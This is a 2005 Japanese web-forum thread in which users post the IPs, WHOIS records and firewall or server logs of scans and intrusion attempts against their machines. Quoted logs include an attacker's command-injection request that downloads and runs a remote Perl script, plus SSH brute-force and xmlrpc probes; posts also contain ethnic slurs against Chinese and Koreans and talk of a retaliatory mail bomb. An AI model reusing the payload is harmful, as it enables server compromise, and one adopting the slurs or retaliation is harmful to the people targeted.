ホスト名 FLH1Aac003.hyg.mesh.ad.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光

IP アドレス: 61.121.35.37


ポート１３５と４４５をずーーーーと狙ってきてるんですけど
日本ですかね、この鬱陶しい人

�IPアドレス��61.121.35.37�
�ホスト名��ntfkok043037.fkok.nt.adsl.ppp.infoweb.ne.jp�
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.0.0/18
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2000/12/12
[返却年月日]
[最終更新] 2003/11/07 11:47:32(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

�IPアドレス��61.121.54.109�
�ホスト名��nttyma014109.tyma.nt.ftth.ppp.infoweb.ne.jp�
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.0.0/18
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2000/12/12
[返却年月日]
[最終更新] 2003/11/07 11:47:32(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

下位情報
----------
該当するデータがありません。

[20:24:13] <222.208.168.142> (200,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/www.search591.com/prx1.php


また中国か・・・多いな・・・

IPアドレス  58.87.242.56

IPアドレス 61.118.154.45
もうさっきから一時間以上来てるこれで２０回目だよ
uzeeeeeeeeeeeeeeeeeeeeee

inetnum: 202.101.177.128 - 202.101.177.255
netname: CHINANET-ZJ-HU
country: CN
descr: CHINANET-ZJ Huzhou node network
descr: Zhejiang Telecom
admin-c: CZ4-AP
tech-c: CH119-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20050429
mnt-by: MAINT-CHINANET-ZJ
mnt-lower: MAINT-CN-CHINANET-ZJ-HU
source: APNIC

http://alink2.uic.to/user/lets5go5.html

2005/11/22(20:40:52) W-SV ns2.e-karnet.net(202.122.19.5) [80] 404 0 "GET /cacti/graph_image.php HTTP/1.1" ( )
2005/11/24(03:30:05) W-SV 211.42.90.126 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:11) W-SV 211.42.90.126 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:17) W-SV 211.42.90.126 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:23) W-SV 211.42.90.126 [80] 404 0 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )
2005/11/24(03:30:29) W-SV 211.42.90.126 [80] 404 0 "GET /cgi-bin/ikonboard/ikonboard.cgi?dir=http//trackingnr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20trackingnr-dhl-usa.com/pl;perl%20pl HTTP/1.1" ( dummy )

IPアドレス 222.100.185.13
ホスト名 対応するホスト名がありません
IPアドレス
　割当国　※ 韓国 (KR)

またかの国か。

＜ﾆﾀﾞｰ＞

DoCoMo/2.0SH901iC(c100;TB;W30H15)
proxy360.docomo.ne.jp
210.136.161.74
DoCoMo/2.0SH901iC(c100;TB;W30H15)

DoCoMo/2.0SH901iC(c100;TB;W30H15)
proxy360.docomo.ne.jp
210.136.161.74
DoCoMo/2.0SH901iC(c100;TB;W30H15)

DoCoMo/2.0SH901iC(c100;TB;W30H15)
proxy360.docomo.ne.jp
210.136.161.74
DoCoMo/2.0SH901iC(c100;TB;W30H15)

222.158.3.57

>>107
61.118.154.45 のホスト名は p4045-ipbf10sapodori.hokkaido.ocn.ne.jp です。

IPアドレス 80.23.33.194 
ホスト名 host194-33.pool8023.interbusiness.it 
IPアドレス
　割当国　※ イタリア (IT) 

80番ポートに何用じゃ氏ね

IPアドレス 220.105.156.41
ホスト名 p2041-ipbf06kyoto.kyoto.ocn.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 京都府
市外局番 --
接続回線 光

ホスト名winkだった俺と同じケーブルＴＶの奴かよｗ

漏れも先ほど、同じプロバイダの香具師の狙われました。同郷だし、やだなぁ。

achrsm003078.adsl.ppp.infoweb.ne.jp
219.116.60.78

[16:28:15] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:17] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:18] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:19] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:21] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:23] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:26] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:28] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:29] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:31] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:35] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:36] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -
[16:28:37] <195.250.24.66> (0,0) [ヘッダー受信中に切断しました] - -

(*ﾟ∀ﾟ) 今度はイタリアかよ

IPアドレス 221.117.215.132
ホスト名 221x117x215x132.ap221.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 北海道

すみません。頻度が多いのですが晒すこともできなくて困ってます。
169.254.31.224
なんですが、無理は承知でお願いします。

219.98.210.62

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.98.192.0/19
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [管理者連絡窓口] MK2734JP
n. [技術連絡担当者] SW314JP
n. [技術連絡担当者] YO078JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
[割当年月日] 2002/04/12
[最終更新] 2004/10/13 15:36:55(JST)

上位情報
----------
ソニーコミュニケーションネットワーク株式会社 (Sony Communication Network Corporation)
[割り振り] 219.98.0.0/16

串使って不正アクセスすると、そのまま串の情報が向こうに行くのか？

ダイヤルアップなんで、不正アクセスの脅威なんて知らない俺ガイル。

串は「刺す」が妥当だったか･･･。

何だかいけない事を聞いたかもしれない･･･答えは書かないでくれ。

>>127-129
(　ﾟДﾟ)ﾎﾟｶｰﾝ

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.224.160.0/22
b. [ネットワーク名] SAKURA-NET
f. [組織名] さくらインターネット株式会社
g. [Organization] SAKURA Internet Inc.
m. [管理者連絡窓口] KT749JP
n. [技術連絡担当者] HS821JP
n. [技術連絡担当者] KW419JP
p. [ネームサーバ] ns1.dns.ne.jp
p. [ネームサーバ] ns2.dns.ne.jp
[割当年月日] 1998/06/18
[最終更新] 2000/12/14 16:53:28(JST)

上位情報
----------
さくらインターネット株式会社 (SAKURA Internet Inc.)
[割り振り] 210.224.160.0/22

下位情報
----------
該当するデータがありません。



これ何？

見てのとおり

221.184.25.225

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 221.184.0.0/19
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-os001.ocn.ad.jp
p. [ネームサーバ] pns.ocn.ad.jp
[割当年月日] 2003/08/05
[返却年月日]
[最終更新] 2003/08/05 13:52:08(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 221.184.0.0/13

206.223.151.225

久しぶりにノートン先生がピコピコしてた・・・
何なのよ一体

210.232.49.3

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.232.49.0-210.232.51.255
b. [ネットワーク名] KJPS-NET
f. [組織名] 株式会社キンデン
g. [Organization] KINDEN Co.,LTD.
m. [管理者連絡窓口] YK7511JP
n. [技術連絡担当者] YK7511JP
p. [ネームサーバ] ns1.kjps.net
p. [ネームサーバ] ns2.kjps.net
[割当年月日] 2003/07/11
[最終更新] 2003/07/14 10:32:02(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 210.232.0.0/16

210.131.38.50

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.131.32.0/19
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 1998/08/21
[最終更新] 2003/11/06 11:08:04(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 210.131.0.0/18

206.223.152.50

遠路はるばるアメリカはネヴァダからいらっしゃーい

206.223.151.225

遠路はるばるアメリカはエヴァダからいｒ・・・

>>137
おまいもですか！こいつしつこくないですか？3回くらいアクセスあったorz

アンカー間違えましたｽﾏｿ；

[19:14:06] <222.92.249.99> (178,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/verify.qq.com/getimage

また中国か('A`)

>>137-138
それNISの誤作動。

なんでセキュ板にその対処法のスレが立ってないか不思議だ。

>>141
問題の単純な呪文でググったら、グーグルも”侵入の疑いにより”接続を遮断されたｗｗｗ
今は、シグネ茶を単一除外にしてるずら。

218.120.204.34

ヤフーBB管理者にログ提出の上、
報告の内容次第では告訴いたします。

[03:10:50] <211.53.110.11> (25,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /sumthin

韓国ﾀｿ(*´Д`)ﾊｧﾊｧ

p6130-ipad06otsu.shiga.ocn.ne.jp
この人なんだよwwwいやしつこすぎるんだが・・有名人？

とりあえず法律違反だよなこれ

inetnum: 203.162.0.0 - 203.162.255.255
netname: VNPT-VNNIC-VN
country: VN
descr: Vietnam Posts and Telecommunications (VNPT)
descr: 23 Phan Chu Trinh st., Hanoi capital, Vietnam
admin-c: NXC1-AP
tech-c: KNH1-AP
status: ALLOCATED PORTABLE
changed: [email protected] 20041011
mnt-by: MAINT-VN-VNNIC
mnt-lower: MAINT-VN-VNPT
source: APNIC



↑これなに？？

>>145
>>145
>>145
>>145
>>145
>>145

つーかヒントぐらいくれ

Dec 1 06:42:55 *** sshd[15668]: Did not receive identification string from 133.60.107.2
Dec 1 06:45:47 *** sshd[15669]: input_userauth_request: illegal user lpd
Dec 1 06:45:47 *** sshd[15669]: Failed password for illegal user lpd from 133.60.107.2 port 60934 ssh2
Dec 1 06:45:47 *** sshd[15669]: Received disconnect from 133.60.107.2: 11: Bye Bye
(略)
Dec 1 06:57:01 *** sshd[16521]: input_userauth_request: illegal user muonline
Dec 1 06:57:01 *** sshd[16521]: Failed password for illegal user muonline from 133.60.107.2 port 37684 ssh2
Dec 1 06:57:01 *** sshd[16521]: Received disconnect from 133.60.107.2: 11: Bye Bye

ここのところ ssh のパスワード探しがまた増えてきたなぁ。
殆どが中韓だけど、珍しく国内からのお客さん。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 133.60.0.0/16
b. [ネットワーク名] HIROIN
f. [組織名] 弘前大学
g. [Organization] Hirosaki University
m. [管理者連絡窓口] MF3045JP
n. [技術連絡担当者] HM006JP
n. [技術連絡担当者] KS7358JP
p. [ネームサーバ] dash.cc.hirosaki-u.ac.jp
p. [ネームサーバ] moya.gw.hirosaki-u.ac.jp
p. [ネームサーバ] slash.cc.hirosaki-u.ac.jp
[割当年月日]
[返却年月日]
[最終更新] 2005/03/08 18:02:02(JST)

>150
踏み台の可能性も高いんでね？

IP:219.125.148.211
HOST:wbcc2s10.ezweb.ne.jp
Agent:KDDI-CA31 UP.Browser/6.2.0.7.3.129 (GUI) MMP/2.0
UTN:05001012917204_ab.ezweb.ne.jp

こいつのメールがスパム、個人的にｗｗ

61.125.231.39

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.125.192.0/18
b. [ネットワーク名] ASAHI-NET
f. [組織名] 朝日ネット

書いてる途中に、またいらっしゃいました
219.15.232.108

inetnum: 219.0.0.0 - 219.63.255.255
netname: BBTECH
descr: SOFTBANK BB CORP
descr: Nation wide network in Japan

202.98.123.179

メールボムでも送ってやろうかと思ったらぺーじが表示できませんだってorz

ページ？
勘違いしてないか？

（spamメールが来たから）メールボムでも送ってやろうかと思ったら（リンク先の）ぺーじが表示できませんだってorz

こんなところか？
だったらすれ違いだな。

スレ違いってより板違いか。

210.175.58.25

[ネットワーク名]KBN-NET
[組織名]香川テレビ放送網株式会社
[Organization]kagawa T.V Broadcast Network Co.,Ltd
[管理者連絡窓口]HM5639JP
[技術連絡担当者]HM5639JP
[ネームサーバ]dns3.odn.ne.jp
[ネームサーバ]ns1.kbn.ne.jp
[ネームサーバ]ns2.kbn.ne.jp
[割当年月日]2002/06/12
[返却年月日]
[最終更新]2002/06/24 10:34:23(JST)

一瞬ケーブルか？と思いきや・・・

2005/12/01〜12/04まで不正アクセスの類が一つもなかった。(/GETとかもない)
珍しいこともあるものだ。

IPアドレス 222.96.154.156 
ホスト名 対応するホスト名がありません 
IPアドレス
　割当国　※ 韓国 (KR) 

特定アジアは氏ね

210.235.234.95


Non-authoritative answer:
95.234.235.210.in-addr.arpa name = dr95.opt2.point.ne.jp.

Authoritative answers can be found from:
234.235.210.in-addr.arpa nameserver = ns.dti.ad.jp.
234.235.210.in-addr.arpa nameserver = ns2.dti.ad.jp.


dr95.opt2.point.ne.jp

YahooBB219184048022.bbtec.net
屑だ

ノートン先生が怒ったんだが
↓
侵入を検出して遮断しました。news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。

にちゃんが攻撃しかけてきた？？？

210.228.173.161

[IPネットワークアドレス] 210.228.173.0-210.228.176.255
[ネットワーク名]MOMOTAROUNET
[組織名]Momoたろうインターネットクラブ(日本晃伸株式会社)
[Organization]Momotarou Internet Club (NIHONKOUSHIN Co.)
[管理者連絡窓口]ST182JP
[技術連絡担当者]ST182JP
[ネームサーバ]ns1.mmtr.or.jp
[ネームサーバ]ns2.mmtr.or.jp
[割当年月日]1998/12/08
[返却年月日]
[最終更新]2003/04/10 14:57:05(JST)

おそらく踏み台にされているな。
でも、三日に一回のペースでサーバー障害を起こしている
プロバイダって・・・

>>164
串かどうか2chが確認するためにポートスキャンしてきただけ。

IPアドレス 59.128.182.206

結構前からチクチクやってくる。
こういうのはISPに苦情出してもいいんだろうか？

218.7.208.64 - 218.7.208.71
netname: HEGANG-TEACHER-COLLEGE
descr: He gang city teacher college
country: CN
admin-c: BG63-AP
tech-c: BG63-AP
changed: [email protected] 20030610

これって昔の日本の師範学校みたいな所からのからの攻撃じゃないのｗ
ちょｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
学校の先生の卵がクラッキングとはｗ

inetnum: 220.184.0.0 - 220.184.255.255
netname: CHINANET-ZJ-HZ
country: CN
descr: CHINANET-ZJ Hangzhou node network
descr: Zhejiang Telecom
admin-c: CZ4-AP
tech-c: CH122-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20050429

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.151.216.0/22
b. [ネットワーク名] HIMEJICATV
f. [組織名] 姫路ケーブルテレビ株式会社
g. [Organization] HIMEJI CABLE TELEVISION CORPORATION
m. [管理者連絡窓口] SN2184JP
n. [技術連絡担当者] SN2184JP
p. [ネームサーバ] ns05.mesh.ad.jp
p. [ネームサーバ] ns1.winknet.ne.jp
p. [ネームサーバ] ns2.winknet.ne.jp
[割当年月日] 2002/09/26

OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

物凄い攻撃受けてるんだけど

>>171
↑そこ、昔私のPCを執拗に攻撃してきた奴だと思う。
プロバイダーA○L使ってるとそこから執拗に攻撃受けるよ･････

>>171-172
お前ら死ね。死ね死ね死ね死ね死ね死ね死ね死ね死ね死んじまえ。

同じぷららの全国のAPから猛烈にアタック食らうんだが。

OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 224.0.0.0 - 239.255.255.255
CIDR: 224.0.0.0/4
NetName: MCAST-NET
NetHandle: NET-224-0-0-0-1

>>175
ﾜﾛｽｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

あなたが検索されたアドレス［ 220.97.196.148 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.97.0.0/16
b. [ネットワーク名] OCN
f. [組織名] オープンコンピュータネットワーク
g. [Organization] Open Computer Network
m. [管理者連絡窓口] AY1361JP
n. [技術連絡担当者] MO081JP
n. [技術連絡担当者] KK551JP
n. [技術連絡担当者] IM657JP
p. [ネームサーバ] ns-kg001.ocn.ad.jp
p. [ネームサーバ] ns-kn001.ocn.ad.jp
[割当年月日] 2002/09/12
[最終更新] 2002/09/12 16:53:08(JST)

上位情報
----------
エヌ・ティ・ティ・コミュニケーションズ株式会社 (NTT COMMUNICATIONS CORPORATION)
[割り振り] 220.96.0.0/14

softbank219184048022.bbtec.net
糞

219.184.48.22

TCP1025
CN うざい

■TCP1025番ポートに対するアクセスの増加について(12/9)

ttp://www.cyberpolice.go.jp/important/2005/20051209_184920.html

http://www.cyberpolice.go.jp/detect/pdf/20051209_1025tcp.pdf

IPアドレス 210.154.213.213
ホスト名 p2213-ipbf201kanazawa.ishikawa.ocn.ne.jp
IPネットワークアドレス 210.154.192.0/18
ネットワーク名 OCN
組織名 オープンコンピュータネットワーク
[Organization]Open Computer Network
[管理者連絡窓口]AY1361JP
[技術連絡担当者]MO081JP
[技術連絡担当者]KK551JP
[技術連絡担当者]IM657JP
[割当年月日]1997/08/07
[返却年月日]
[最終更新]2002/01/28 10:48:43(JST)

三日以上昼夜を問わず突っ込んでくる。
此処まで異常なアクセス要求を連日出していても
管理者は気付かないのか？
IPは変われども、数ヶ月前からウィルスにやられた
同じヤツだと思うのだが・・・
マジで苦情出そうかなあ・・・

最近　中国からばっか。なんとかなんない？
inetnum: 219.128.0.0 - 219.153.255.255
netname: CHINANET-CN
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: CH93-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-CHINANET
status: ALLOCATED PORTABLE
changed: [email protected] 20050120
source: APNIC

inetnum: 219.128.0.0 - 219.137.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020424
changed: [email protected] 20041207
source: APNIC

% APNIC database, last updated 20050925 23:00:32

inetnum: 218.13.0.0 - 218.20.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: APNIC-HM
mnt-by: MAINT-CHINANET
status: ALLOCATED PORTABLE
changed: [email protected] 20050511
source: APNIC

inetnum: 218.13.0.0 - 218.18.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20010528
changed: [email protected] 20041207
source: APNIC

OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 224.0.0.0 - 239.255.255.255
CIDR: 224.0.0.0/4
NetName: MCAST-NET
NetHandle: NET-224-0-0-0-1
Parent:
NetType: IANA Special Use
NameServer: FLAG.EP.NET
NameServer: STRUL.STUPI.SE
NameServer: NS.ISI.EDU
NameServer: NIC.NEAR.NET
Comment: This block is reserved for special purposes.
Comment: Please see RFC 3171 for additional information.
Comment:
RegDate: 1991-05-22
Updated: 2002-09-16

inetnum: 220.189.228.144 - 220.189.228.151
netname: SHANGYU-XIAOYUE-HIGH-SCHOOL
country: CN　　　→　（中国）
descr: Shangyu Xiaoyue High School

status: ASSIGNED NON-PORTABLE
changed: [email protected] 20050429

role: CHINANET-ZJ Shaoxing
address: No.9 Sima Road,Shaoxing,Zhejiang.312000
country: CN　　　→　（中国）
phone: +86-575-5136199
fax-no: +86-575-5114449
admin-c: CH109-AP
tech-c: CH109-AP
nic-hdl: CS64-AP
mnt-by: MAINT-CHINANET-ZJ
changed: [email protected] 20031204
source: APNIC

person: Huafu Zhe
nic-hdl: HZ395-AP
e-mail: [email protected]
address: Xiaoyue High School,Shangyu,Shaoxing,Zhejiang.Postcode:312300
phone: +86-575-2117535
country: CN　　　→　（中国）
changed: [email protected] 20050421
mnt-by: MAINT-CN-CHINANET-ZJ-SX
source: APNIC

今日は中国からハッキングが多いんだがなぜだ
inetnum: 203.175.192.0 - 203.175.255.255
netname: NBIP
descr: NBIP CNC(Ningbo)info-Port co.,Ltd
country: CN
admin-c: CJ118-AP
tech-c: CJ118-AP
status: ALLOCATED PORTABLE
changed: [email protected] 20021128
mnt-by: APNIC-HM
mnt-lower: MAINT-CN-NBIP
source: APNIC

ここ２，３日シナから多い
219.234.184.221
202.98.201.75
218.64.68.56
…

>>ttp://ex14.2ch.net/test/read.cgi/news4vip/1134192526/l50　ｱﾌｫです

role: CHINANET HUNAN
address: No.1 TuanJie road,ChangSha,Hunan 410005
country: CN　　　→　（中国）
phone: +86 731 4792092
fax-no: +86 731 4792007
e-mail: [email protected]
trouble: send spam reports to [email protected]
trouble: and abuse reports to [email protected]
trouble: Please include detailed information and
trouble: times in UTC
admin-c: CH632-AP
tech-c: CS499-AP
nic-hdl: CH636-AP
mnt-by: MAINT-CHINANET-HN
changed: [email protected] 20050816
source: APNIC

inetnum: 222.32.0.0 - 222.63.255.255
descr: CHINA RAILWAY TELECOMMUNICATIONS
netname: CRTC
person: LV QIANG
nic-hdl: LQ112-AP
e-mail: [email protected]
address: 22F Yuetan Mansion,Xicheng District,Beijing,P.R.China
phone: +86-10-51892106
fax-no: +86-10-51890674
country: CN　　　→　（中国）
changed: [email protected] 20050823
mnt-by: MAINT-CNNIC-AP
source: APNIC

inetnum: 61.157.0.0 - 61.157.255.255
netname: CHINANET-SC
descr: CHINANET Sichuan province network
descr: Data Communication Division
descr: China Telecom
country: シナ
admin-c: CH93-AP
tech-c: XS16-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-SC
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20000701
changed: [email protected] 20040927
changed: [email protected] 20041126
source: APNIC

% APNIC database, last updated 20050925 23:00:32

inetnum: 219.234.184.0 - 219.234.184.255
netname: YI-GUO-ZAI-XIAN
country: シナ
descr: BEIJING YI-GUO-ZAI-XIAN CO.LTD
descr: CO.LTD
admin-c: PP40-AP
tech-c: PP40-AP
status: ASSIGNED NON-PORTABLE
changed: [email protected] 20030211
mnt-by: MAINT-CNNIC-AP
source: APNIC

やたらと中国から攻撃される
何かあったの？

中国方面からUDP:1026...1030あたりを激しくハァハァされてる。
同じIPから何度も何度も。

中国多発。
今のノートンはピコピコじゃないからうざい。

239.255.255.250

米の国か
しつこいな

・・・と思ったら違った！！

中国ウザすぎ。

NTV板に入ろうとすると206.223.150.96からHTTP MSIE JaveScript OnLoad RteCodeExec
で攻撃されるんだがこれってウイルスが俺のパソコンに入っているの？

今日中国にIP別々で10回もハッキングされているんだけどなんかあったのか
inetnum: 218.87.0.0 - 218.87.255.255
netname: CHINANET-JX
country: CN
descr: CHINANET jiangxi province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
admin-c: CH93-AP
tech-c: JN113-AP
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020829
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-IP-WWF
source: APNIC

% APNIC database, last updated 20050925 23:00:32
文字を書き込んでいる途中にも218.87.65.83からもハッキングされた

中国から攻撃を受けているのが俺だけじゃなくてちょっと安心

IPアドレス 222.2.147.66
ホスト名 ZG147066.ppp.dion.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 愛知県
市外局番 --
接続回線 xDSL

今は数分おきに攻撃があるぞｗ
基地外中国人は何がしたいんだ？

ぜんぜん来ないよ・・・
さびしいよ・・・

昨日からずーっと中国から1025攻撃されてる
キリがない

パールハーバーのノリかな?

最近はK察も不正アクセスに対してアナウンスするようになったのね

警察庁は9日、主に中国の不特定のIPアドレスを発信元とする、
TCP 1025番ポートに対するアクセスの増加を検知したとして、注意喚起を行なった。
TCP 1025番ポートへのアクセスは8日の21時頃から急増し、9日現在もアクセスが続いている。
アクセス増加の原因については現在のところ不明だが、このポートはWindowsのRPC DCOMなどで利用されるもので、
大規模なスキャンの可能性があるという。警察庁では、修正プログラムの適用を行なうなど、
使用しているコンピュータのセキュリティの再確認を推奨している。

http://internet.watch.impress.co.jp/cda/news/2005/12/09/10174.html

今、中国から来ました
218.64.69.85

数分おきにチャイナから攻撃されてウザッたいなぁ

そうえいば２ＣＨにセキュリティ板あったなあと思って来てみたら・・・。
みんなここ最近中華から攻撃されてるのか。俺も数分おきくらいにノートン先生が反応する

いや〜
もうかれこれ40回は攻撃されちゃってるよぅ、チャイナから
なに今度はネットで反日活動？活動と言うか攻撃？

5EX

チャイナギャルに攻撃されたい

>>209
それ見つけてルータのログ見たら1025アクセスがさっそく見つかってワロタ

>>209
俺も調べたら中国から
1025-1030のアクセスがあった。

チョンやチャンコロのためにログ領域消費するのは無駄。つーか、ログが穢れる。
チョンとチャンコロはルールの最初で無条件に落としといて、回数だけカウント。

攻撃があるとかアクセスがあるとか、どうやってわかるの？

218.5.18.93
チャンコロむかつく

>>220
俺もそいつから今攻撃された
昨日から中国の攻撃がすごい多い

2005/12/11(14:56:56) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /thisdoesnotexistahaha.php HTTP/1.1" ( dummy )
2005/12/11(14:56:57) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:58) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /file/trunk/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:58) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /log/trunk/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:59) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /trunk/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:56:59) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /wordpress/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:00) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:01) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /drupal/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:01) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlrpc/xmlrpc.php HTTP/1.1" ( dummy )
2005/12/11(14:57:02) W-SV 82-70-213-245.dsl.in-addr.zen.co.uk(82.70.213.245) [80] 404 0 "GET /xmlsrv/xmlrpc.php HTTP/1.1" ( dummy )
